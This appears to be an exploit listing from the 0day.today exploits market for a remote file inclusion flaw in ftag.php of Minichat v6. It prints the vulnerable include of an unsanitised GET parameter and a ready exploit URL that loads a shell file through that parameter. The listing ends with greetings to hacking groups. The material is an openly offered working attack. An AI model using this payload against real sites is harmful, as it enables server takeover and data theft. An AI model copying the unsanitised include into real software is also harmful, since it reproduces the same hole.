[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Minichat v6 (ftag.php) Remote File Include Vulnerability

Author
Zickox
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-962
Category
web applications
Date add
10-10-2006
Platform
unsorted
========================================================
Minichat v6 (ftag.php) Remote File Include Vulnerability
========================================================



###############################################################################################################

     Minichat v6 Remote File Include
###############################################################################################################

Affected Software .: Minichat v6
Class................... : Remote File Inclusion
Found by.............: Zickox

###############################################################################################################
Affected File:

ftag.php

###############################################################################################################

Code vulnerable:

<? include($_GET['mostrar']); ?>


###############################################################################################################


Exploit:

http://www.victim.com/path/ftag.php?mostrar=shell.txt?

###############################################################################################################

Special GreetingS: NETTOXIC | Txis | The Shredder | erboot | trty | jasus | Cvir.System | ZeroHack Team




#  0day.today [2024-12-25]  #